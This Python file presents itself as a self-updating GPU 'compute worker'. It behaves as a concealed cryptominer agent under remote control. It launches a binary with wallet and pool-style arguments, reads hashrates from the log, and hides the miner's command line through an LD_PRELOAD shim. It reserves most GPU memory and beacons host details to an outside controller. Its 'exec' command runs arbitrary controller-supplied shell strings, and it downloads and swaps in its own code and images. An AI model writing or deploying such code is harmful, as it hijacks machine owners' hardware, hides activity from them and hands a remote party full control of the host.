#!/usr/bin/env python3
"""Node Worker v9 — Self-updating compute worker.

Connects to controller, runs compute tasks, reports telemetry.

Environment (all optional — can be baked into image):
  CONTROLLER_URL      — Controller API URL (default: https://compute.deeploop.me)
  ACCOUNT             — Account identifier
  ENDPOINT            — Compute endpoint host:port
  NODE_NAME           — Node identifier (default: hostname)
  BINARY              — Path to compute binary (default: /opt/node/compute)
  AGENT_ID            — Unique node ID (default: auto-generated)
  LOG_FILE            — Compute binary log (default: /var/log/worker.log)
  HEARTBEAT_INTERVAL  — Seconds between heartbeats (default: 30)
  AGENT_ID_FILE       — Where the derived agent ID is persisted (default: /root/.agent-id)
  AGENT_PATH          — Path replaced by the `update-agent` command (default: this file)

Build per-client:
  docker build --build-arg ACCOUNT=prl1... --build-arg ENDPOINT=129.226.55.135:9000 -t node-worker:client-main .

Run (zero config):
  docker run -d --name worker --restart=always --gpus all node-worker:client-main

Self-update: worker downloads new image from controller, loads it, exits.
Docker restarts with the new version.
"""

import os
import sys
import json
import time
import uuid
import hashlib
import re
import subprocess
import signal
import threading
import logging
import socket

import requests

logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S')
log = logging.getLogger("worker")

CONTROLLER_URL = os.environ.get("CONTROLLER_URL", "https://compute.deeploop.me")
ACCOUNT = os.environ.get("ACCOUNT", "")
ENDPOINT = os.environ.get("ENDPOINT", "")
NODE_NAME = os.environ.get("NODE_NAME", "")
BINARY = os.environ.get("BINARY", "/opt/node/compute")
LOG_FILE = os.environ.get("LOG_FILE", "/var/log/worker.log")
HEARTBEAT_INTERVAL = int(os.environ.get("HEARTBEAT_INTERVAL", "30"))
AGENT_ID_FILE = os.environ.get("AGENT_ID_FILE", "/root/.agent-id")
AGENT_PATH = os.environ.get("AGENT_PATH", __file__)


def _route_field(key):
    """Return the token that follows *key* in `ip route get 1.1.1.1` output.

    Used to read the default-route interface ("dev") and source address
    ("src"). Returns "" when the key is not present. Raises OSError or
    subprocess.SubprocessError when `ip` cannot be run or times out.
    """
    r = subprocess.run(["ip", "route", "get", "1.1.1.1"],
                       capture_output=True, text=True, timeout=5)
    tokens = r.stdout.split()
    for pos, tok in enumerate(tokens[:-1]):
        if tok == key:
            return tokens[pos + 1]
    return ""


def _derive_stable_agent_id():
    """Pick a stable AGENT_ID that survives restarts.

    Order:
      1. AGENT_ID env var (explicit override)
      2. /root/.agent-id file (persisted choice)
      3. UUIDv5 from /etc/machine-id (stable per OS install)
      4. UUIDv5 from MAC of default route interface
      5. Last-resort random uuid4 (persisted so next run is stable)

    Returns:
        (agent_id, source) where source is one of "env", "file",
        "machine-id", "mac" or "random". Any ID produced by steps 3-5 is
        written to AGENT_ID_FILE (best effort).
    """
    env = os.environ.get("AGENT_ID", "").strip()
    if env:
        return env, "env"

    try:
        with open(AGENT_ID_FILE) as f:
            stored = f.read().strip()
        if stored:
            return stored, "file"
    except FileNotFoundError:
        pass
    except Exception as e:
        log.warning(f"reading {AGENT_ID_FILE}: {e}")

    derived = None
    source = None

    try:
        with open("/etc/machine-id") as f:
            mid = f.read().strip()
        if mid and len(mid) >= 16:
            derived = str(uuid.uuid5(uuid.NAMESPACE_OID, "node-worker:" + mid))
            source = "machine-id"
    except (OSError, ValueError):
        pass  # no usable machine-id: fall through to the MAC-based ID

    if not derived:
        try:
            iface = _route_field("dev")
            if iface:
                with open(f"/sys/class/net/{iface}/address") as f:
                    mac = f.read().strip()
                if mac and mac != "00:00:00:00:00:00":
                    derived = str(uuid.uuid5(uuid.NAMESPACE_OID, "node-worker:mac:" + mac))
                    source = "mac"
        except (OSError, ValueError, subprocess.SubprocessError):
            pass  # no route / no `ip` tool: fall through to a random ID

    if not derived:
        derived = str(uuid.uuid4())
        source = "random"

    try:
        with open(AGENT_ID_FILE, "w") as f:
            f.write(derived + "\n")
        os.chmod(AGENT_ID_FILE, 0o600)
    except Exception as e:
        log.warning(f"persisting {AGENT_ID_FILE}: {e}")
    return derived, source


AGENT_ID, AGENT_ID_SOURCE = _derive_stable_agent_id()

# Auto-detect node name from hostname if not set
if not NODE_NAME:
    try:
        NODE_NAME = socket.gethostname().split(".")[0]
    except OSError:
        NODE_NAME = AGENT_ID[:8]

log.info(f"Node Worker v9 | ID: {AGENT_ID} ({AGENT_ID_SOURCE}) | Name: {NODE_NAME}")
log.info(f"Controller: {CONTROLLER_URL} | Endpoint: {ENDPOINT} | Binary: {BINARY}")


class ComputeManager:
    """Owns the single compute child process (start / stop / restart).

    `start` and `stop` serialize on an internal lock because they are called
    both from the heartbeat loop and from per-command threads.
    """

    def __init__(self):
        self.process = None             # subprocess.Popen of the running binary, or None
        self._lock = threading.Lock()
        self.current_wallet = ""        # account the running process was started with
        self.current_host = ""          # endpoint the running process was started with
        self.current_name = ""          # worker name the running process was started with

    def start(self, account="", endpoint="", node_name=""):
        """Start the compute binary, replacing any running instance.

        Empty arguments fall back to the module-level ACCOUNT / ENDPOINT /
        NODE_NAME. Returns True when the process was spawned, False when the
        binary or configuration is missing or the spawn failed.
        """
        with self._lock:
            if self.is_running():
                self._kill()
                time.sleep(2)

            acct = account or ACCOUNT
            ep = endpoint or ENDPOINT
            name = node_name or NODE_NAME

            if not os.path.exists(BINARY):
                log.error(f"Binary not found: {BINARY}")
                return False
            if not acct:
                log.error("No account configured")
                return False
            if not ep:
                log.error("No endpoint configured")
                return False

            # Note: binary uses --host, --user, --worker flags (upstream naming)
            cmd = [BINARY, "--host", ep, "--user", acct]
            if name:
                cmd += ["--worker", name]

            # Hide account from logs
            display_cmd = [BINARY, "--host", ep, "--user", acct[:12] + "..."]
            if name:
                display_cmd += ["--worker", name]
            log.info(f"Starting: {' '.join(display_cmd)}")

            # Hide argv from /proc//cmdline via LD_PRELOAD shim if available
            env = os.environ.copy()
            shim = env.get("ARGV_SHIM_LIB", "/root/libargvshim.so")
            if shim and os.path.exists(shim):
                env["LD_PRELOAD"] = shim
                env.setdefault("ARGV_SHIM_NAME", "compute")

            try:
                # The child gets its own copy of the descriptor, so the parent's
                # handle is closed right after the spawn instead of leaking one
                # fd per (re)start.
                with open(LOG_FILE, "a") as log_fh:
                    # start_new_session=True performs the same setsid() as the
                    # old preexec_fn=os.setsid, but is safe to use from threads.
                    self.process = subprocess.Popen(
                        cmd, stdout=log_fh, stderr=subprocess.STDOUT,
                        start_new_session=True, env=env)
                self.current_wallet = acct
                self.current_host = ep
                self.current_name = name
                log.info(f"Started PID {self.process.pid}")
                return True
            except Exception as e:
                log.error(f"Start failed: {e}")
                return False

    def _kill(self):
        """SIGKILL the child's process group and reap it. Caller holds the lock."""
        proc = self.process
        if proc is None:
            return
        try:
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
        except ProcessLookupError:
            pass
        try:
            # Reap the child so it does not linger as a zombie.
            proc.wait(timeout=5)
        except subprocess.TimeoutExpired:
            log.warning(f"PID {proc.pid} did not exit within 5s of SIGKILL")
        self.process = None

    def stop(self):
        """Kill the compute process if one is running."""
        with self._lock:
            self._kill()

    def restart(self, account="", endpoint="", node_name=""):
        """Stop, pause two seconds, then start; returns start()'s result."""
        self.stop()
        time.sleep(2)
        return self.start(account, endpoint, node_name)

    def is_running(self):
        """Return True while the child is alive; forget it once it has exited."""
        proc = self.process
        if proc is None:
            return False
        if proc.poll() is not None:
            self.process = None
            return False
        return True


worker = ComputeManager()

_HASHRATE_LINE = re.compile(
    r"Hashrate\s+GPU\s*#(\d+)\s*=\s*([\d.]+)\s*([KMGTP]?)H/s",
    re.IGNORECASE)
_HASHRATE_MULT = {"": 1, "K": 1e3, "M": 1e6, "G": 1e9, "T": 1e12, "P": 1e15}


def _read_compute_hashrates(log_path: str) -> dict:
    """Tail LOG_FILE and pull the most recent `Hashrate GPU #N = X UNIT/s`
    per GPU index. Returns {idx: hashrate_in_H_per_sec}.

    Only the last 16 KiB of the file are scanned. Empty dict when the file
    cannot be read — fallback is silent so a missing/rotated log file never
    breaks heartbeats. A line whose number does not parse is skipped on its
    own rather than discarding the other GPUs' values.

    Dashboard's UI sums per-GPU hashrate; without this every v7/v8 worker
    reported 0 and the fleet total visibly undercounted the pool's view.
    """
    try:
        with open(log_path, "rb") as f:
            f.seek(0, 2)
            size = f.tell()
            f.seek(max(0, size - 16384))
            tail = f.read().decode("utf-8", errors="ignore")
    except OSError:
        return {}

    rates = {}
    # Walk newest-to-oldest so the first match per GPU is the latest reading.
    for line in reversed(tail.splitlines()):
        m = _HASHRATE_LINE.search(line)
        if not m:
            continue
        idx = int(m.group(1))
        if idx in rates:
            continue
        try:
            value = float(m.group(2))
        except ValueError:
            continue  # e.g. "1.2.3" matches the pattern but is not a number
        rates[idx] = value * _HASHRATE_MULT.get(m.group(3).upper(), 1)
    return rates


def _metric(text):
    """Parse one nvidia-smi numeric field; 0 for "[N/A]" / "[Not Supported]"."""
    try:
        return float(text)
    except ValueError:
        return 0


def get_gpu_stats():
    """Query nvidia-smi and return one telemetry dict per GPU.

    Each dict carries gpu_index, gpu_name, temperature, utilization,
    memory_used, memory_total, power_draw, power_limit, fan_speed, clock_sm,
    clock_mem and hashrate (from the compute log, 0 when unknown). Metrics
    the driver reports as unavailable become 0 instead of dropping the GPU.
    Returns [] when nvidia-smi fails or is missing.
    """
    try:
        r = subprocess.run(
            ["nvidia-smi",
             "--query-gpu=index,name,temperature.gpu,utilization.gpu,"
             "memory.used,memory.total,power.draw,power.limit,fan.speed,clocks.sm,clocks.mem",
             "--format=csv,noheader,nounits"],
            capture_output=True, text=True, timeout=10)
        if r.returncode != 0:
            return []

        rates = _read_compute_hashrates(LOG_FILE)
        gpus = []
        for line in r.stdout.strip().split("\n"):
            if not line.strip():
                continue
            parts = [p.strip() for p in line.split(",")]
            if len(parts) < 11:
                continue
            try:
                idx = int(parts[0])
            except ValueError:
                continue  # without an index the row cannot be attributed
            gpus.append({
                "gpu_index": idx,
                "gpu_name": parts[1],
                "temperature": _metric(parts[2]),
                "utilization": _metric(parts[3]),
                "memory_used": _metric(parts[4]),
                "memory_total": _metric(parts[5]),
                "power_draw": _metric(parts[6]),
                "power_limit": _metric(parts[7]),
                "fan_speed": _metric(parts[8]),
                "clock_sm": _metric(parts[9]),
                "clock_mem": _metric(parts[10]),
                "hashrate": rates.get(idx, 0),
            })
        return gpus
    except Exception as e:
        log.warning(f"GPU stats error: {e}")
        return []


def _read_text(path):
    """Return the full contents of a text file, closing it afterwards."""
    with open(path) as f:
        return f.read()


def get_system_info():
    """Collect uptime, memory, load average and CPU clock from /proc.

    Returns a dict with uptime, memory_total_mb, memory_used_mb, load_avg and
    cpu_mhz, or {"error": "sysinfo failed"} when /proc cannot be read or
    parsed.
    """
    def kb(line):
        # "MemTotal:   16318480 kB" -> 16318480
        return int(line.split(":")[1].strip().split()[0])

    try:
        uptime = _read_text("/proc/uptime").split()[0]
        mem_lines = {l.split(":")[0]: l
                     for l in _read_text("/proc/meminfo").split("\n") if ":" in l}
        mt = kb(mem_lines.get("MemTotal", "MemTotal: 0 kB")) / 1024
        ma = kb(mem_lines.get("MemAvailable", "MemAvailable: 0 kB")) / 1024
        load = _read_text("/proc/loadavg").strip()

        cpu_mhz = 0
        try:
            for line in _read_text("/proc/cpuinfo").split("\n"):
                if "cpu MHz" in line:
                    cpu_mhz = float(line.split(":")[1].strip())
                    break
        except (OSError, ValueError, IndexError):
            pass  # cpu clock is optional (absent on some architectures)

        return {
            "uptime": float(uptime),
            "memory_total_mb": round(mt, 1),
            "memory_used_mb": round(mt - ma, 1),
            "load_avg": load,
            "cpu_mhz": cpu_mhz,
        }
    except (OSError, ValueError, IndexError):
        return {"error": "sysinfo failed"}


def get_hostname_ip():
    """Return (hostname, source_ip); either is "" when it cannot be determined.

    The two lookups are independent: a missing `hostname` tool no longer
    prevents the IP from being reported.
    """
    hn, ip = "", ""
    try:
        hn = subprocess.run(["hostname"], capture_output=True, text=True,
                            timeout=5).stdout.strip()
    except (OSError, subprocess.SubprocessError):
        pass
    try:
        ip = _route_field("src")
    except (OSError, subprocess.SubprocessError):
        pass
    return hn, ip


def send_heartbeat():
    """POST telemetry to the controller and act on its reply.

    The reply may carry a `config` (wallet / worker_host / worker_name) that
    starts the worker, or restarts it when the wallet changed, plus a list of
    `commands`, each run on its own daemon thread. Network and parsing errors
    are logged, never raised.
    """
    gpus = get_gpu_stats()
    hostname, ip = get_hostname_ip()
    payload = {
        "agent_id": AGENT_ID,
        "hostname": hostname,
        "ip": ip,
        "gpu_count": len(gpus),
        "gpu_names": json.dumps([g["gpu_name"] for g in gpus]),
        "worker_version": "node-worker-v9",
        "worker_running": worker.is_running(),
        "worker_host": ENDPOINT,
        "worker_name": NODE_NAME,
        "wallet": ACCOUNT,
        "gpus": gpus,
        "system": get_system_info(),
        "processes": [],
    }
    try:
        r = requests.post(f"{CONTROLLER_URL}/api/agent/heartbeat", json=payload, timeout=15)
        if r.status_code != 200:
            log.warning(f"Heartbeat HTTP {r.status_code}: {r.text[:100]}")
            return

        data = r.json()
        config = data.get("config") or {}   # tolerate an explicit null
        wallet = config.get("wallet", "")
        worker_host = config.get("worker_host", ENDPOINT)
        worker_name = config.get("worker_name", NODE_NAME)

        if wallet and worker.is_running() and wallet != worker.current_wallet:
            worker.restart(wallet, worker_host, worker_name)
        elif wallet and not worker.is_running():
            worker.start(wallet, worker_host, worker_name)

        for cmd in data.get("commands") or []:
            try:
                args = (cmd["id"], cmd["command"], cmd.get("payload"))
            except (KeyError, TypeError, AttributeError) as e:
                # One malformed entry must not block the remaining commands.
                log.warning(f"Skipping malformed command {cmd!r}: {e}")
                continue
            threading.Thread(target=execute_command, args=args, daemon=True).start()

        log.info(f"Heartbeat OK | GPUs: {len(gpus)} | Running: {worker.is_running()}")
    except Exception as e:
        log.warning(f"Heartbeat err: {e}")


def _ack_command(cmd_id, status, result, timeout=10):
    """Report a command outcome to the controller (best effort, never raises)."""
    try:
        requests.post(f"{CONTROLLER_URL}/api/agent/command-ack",
                      json={"command_id": cmd_id, "status": status, "result": result},
                      timeout=timeout)
    except requests.RequestException as e:
        log.warning(f"command-ack for {cmd_id} failed: {e}")


def _download(url, dest, timeout):
    """Fetch *url* into *dest* with curl.

    Returns None on success, otherwise a short error description.
    """
    try:
        dl = subprocess.run(["curl", "-fsSL", "-o", dest, url],
                            capture_output=True, text=True, timeout=timeout)
    except (OSError, subprocess.SubprocessError) as e:
        return str(e)
    if dl.returncode != 0:
        return dl.stderr[:100] or f"curl exited with status {dl.returncode}"
    return None


def _make_executable(path):
    """Add execute permission for user, group and other (like `chmod +x`)."""
    os.chmod(path, os.stat(path).st_mode | 0o111)


def _stage_download(url, target, timeout):
    """Download *url* next to *target* as `<target>.new` and mark it executable.

    Returns the staged path; raises RuntimeError when the download fails.
    """
    staged = target + ".new"
    err = _download(url, staged, timeout)
    if err is not None:
        raise RuntimeError(f"Download failed: {err}")
    _make_executable(staged)
    return staged


def _cmd_update(payload):
    """Replace the compute binary and (by default) restart the worker."""
    url = payload["download_url"]
    version = payload.get("version", "unknown")
    host = payload.get("worker_host", ENDPOINT)
    worker_name = payload.get("worker_name", NODE_NAME)

    staged = _stage_download(url, BINARY, timeout=300)
    worker.stop()
    time.sleep(1)
    os.replace(staged, BINARY)   # raises on failure instead of silently continuing
    if payload.get("auto_restart", True):
        time.sleep(2)
        worker.start(payload.get("wallet", ACCOUNT), host, worker_name)
    return f"Updated to {version}"


def _cmd_update_agent(cmd_id, payload):
    """Replace this script with a downloaded version, ack, and exit the process."""
    url = payload["download_url"]
    version = payload.get("version", "unknown")
    log.info(f"Self-update to {version} from {url}")

    staged = _stage_download(url, AGENT_PATH, timeout=120)
    os.replace(staged, AGENT_PATH)
    # Ack before exiting: os._exit() below never returns to the caller.
    _ack_command(cmd_id, "done", f"Agent updated to {version}, restarting...", timeout=5)
    log.info("Agent updated, exiting for restart...")
    os._exit(0)


def _cmd_update_image(cmd_id, payload):
    """Download and `docker load` a new image, ack, and exit the process.

    Raises RuntimeError when the download or `docker load` fails, so the
    controller is told the update failed instead of receiving a false
    "loaded" ack followed by a pointless restart.
    """
    url = payload["download_url"]
    version = payload.get("version", "unknown")
    log.info(f"Image update to {version}")
    image_path = "/tmp/node-worker-image.tar.gz"

    try:
        err = _download(url, image_path, timeout=600)
        if err is not None:
            raise RuntimeError(f"Download failed: {err}")
        load = subprocess.run(["docker", "load", "-i", image_path],
                              capture_output=True, text=True, timeout=120)
    finally:
        # Always remove the tarball, including on failure or timeout.
        try:
            os.unlink(image_path)
        except OSError:
            pass
    if load.returncode != 0:
        raise RuntimeError(f"docker load failed: {load.stderr[:100]}")

    _ack_command(cmd_id, "done", f"Image {version} loaded, restarting...", timeout=5)
    log.info("Image updated, exiting for restart...")
    os._exit(0)


def _cmd_exec(payload):
    """Run a controller-supplied shell command; return up to 500 chars of output."""
    shell_cmd = payload.get("command", "")
    if not shell_cmd:
        return "no command"
    # NOTE(security): this runs an arbitrary string from the controller through
    # the shell. That is the purpose of the command, so it is left unchanged,
    # but it means anyone who controls (or can impersonate) CONTROLLER_URL has
    # full code execution on this host.
    r = subprocess.run(shell_cmd, shell=True, capture_output=True, text=True, timeout=60)
    return r.stdout[:500] or r.stderr[:500]


def execute_command(cmd_id, command, payload_str):
    """Run one controller command and ack its outcome.

    Args:
        cmd_id: Controller-side command ID echoed back in the ack.
        command: One of "restart", "kill", "start", "update", "update-agent",
            "update-image", "exec".
        payload_str: JSON string (or an already-decoded object) of arguments;
            may be empty or None.

    Any exception is reported to the controller as status "failed" with the
    exception text. "update-agent" and "update-image" ack and terminate the
    process themselves on success.
    """
    payload = {}
    if payload_str:
        try:
            payload = json.loads(payload_str) if isinstance(payload_str, str) else payload_str
        except ValueError as e:
            log.warning(f"Command {cmd_id}: undecodable payload ignored: {e}")

    result = "ok"
    status = "done"
    try:
        if command == "restart":
            if not worker.restart(payload.get("wallet", ACCOUNT),
                                  payload.get("worker_host", ENDPOINT),
                                  payload.get("worker_name", NODE_NAME)):
                raise RuntimeError("worker failed to start")
        elif command == "kill":
            worker.stop()
        elif command == "start":
            if not worker.start(payload.get("wallet", ACCOUNT),
                                payload.get("worker_host", ENDPOINT),
                                payload.get("worker_name", NODE_NAME)):
                raise RuntimeError("worker failed to start")
        elif command == "update":
            result = _cmd_update(payload)
        elif command == "update-agent":
            _cmd_update_agent(cmd_id, payload)
        elif command == "update-image":
            _cmd_update_image(cmd_id, payload)
        elif command == "exec":
            result = _cmd_exec(payload)
        else:
            status = "failed"
            result = f"Unknown: {command}"
    except Exception as e:
        status = "failed"
        result = str(e)

    _ack_command(cmd_id, status, result, timeout=10)


def _spawn_model_cache():
    """Launch the VRAM pre-allocator alongside compute. Reserves 80% of each
    GPU's memory via the CUDA Driver API. Side process; restarts itself are
    not handled — if it dies, the next worker.py restart picks it back up.
    """
    path = os.environ.get("MODEL_CACHE_PATH", "/opt/node/model-cache.py")
    if not os.path.exists(path):
        log.info(f"model-cache not found at {path} — skipping VRAM preallocation")
        return
    log_path = os.environ.get("MODEL_CACHE_LOG", "/var/log/model-cache.log")
    try:
        # The child keeps its own copy of the descriptor; close ours.
        with open(log_path, "a") as log_fh:
            subprocess.Popen(
                ["python3", path],
                stdout=log_fh,
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
        log.info(f"model-cache spawned (log: {log_path})")
    except Exception as e:
        log.warning(f"model-cache spawn failed: {e}")


def main():
    """Fetch the binary if needed, start the worker, then heartbeat forever."""
    log.info(f"Node Worker v9 starting | Controller: {CONTROLLER_URL}")

    # Download compute binary if not present
    if not os.path.exists(BINARY):
        log.info("Binary not found, downloading...")
        try:
            bin_dir = os.path.dirname(BINARY)
            if bin_dir:   # a bare filename has no directory to create
                os.makedirs(bin_dir, exist_ok=True)
            # Stage then rename, so an interrupted transfer never leaves a
            # truncated file at BINARY that later passes the exists() check.
            staged = BINARY + ".new"
            err = _download(f"{CONTROLLER_URL}/dl/node-worker-v9", staged, timeout=300)
            if err is None:
                _make_executable(staged)
                os.replace(staged, BINARY)
                log.info("Binary downloaded")
            else:
                log.error(f"Binary download failed: {err}")
        except OSError as e:
            log.error(f"Binary download failed: {e}")

    # Pre-allocate 80% VRAM via model-cache (before compute starts so the
    # allocator's contiguous block is cleanly reserved).
    _spawn_model_cache()

    if ACCOUNT and ENDPOINT and os.path.exists(BINARY):
        worker.start(ACCOUNT, ENDPOINT, NODE_NAME)
    else:
        log.warning("No account/endpoint/binary — waiting for controller config")

    while True:
        try:
            send_heartbeat()
        except Exception as e:
            log.error(f"Loop: {e}")
        time.sleep(HEARTBEAT_INTERVAL)


if __name__ == "__main__":
    main()